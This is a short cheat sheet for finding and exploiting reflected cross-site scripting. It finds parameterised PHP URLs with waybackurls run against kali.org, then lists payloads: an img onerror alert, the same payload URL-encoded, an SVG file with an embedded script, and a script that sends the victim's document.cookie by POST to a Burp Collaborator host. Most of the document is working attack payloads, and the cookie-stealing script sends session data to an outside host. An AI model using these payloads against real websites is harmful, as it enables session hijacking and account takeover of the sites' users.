Reflected XSS
======================

waybackurls kali.org

we got a url with ".php?id=" or ".php?ref=" or ".php?name="
so let's try payload "><img src=x onerror=alert(document.domain);>

or we can use encrypted values : https://www.urlencoder.io/
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3B%3E

===============================================================================

"><img src=x onerror=alert(document.domain);>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3B%3E
===============================================
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Cyber Goddess");
  </script>
</svg>
======================================

 <script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>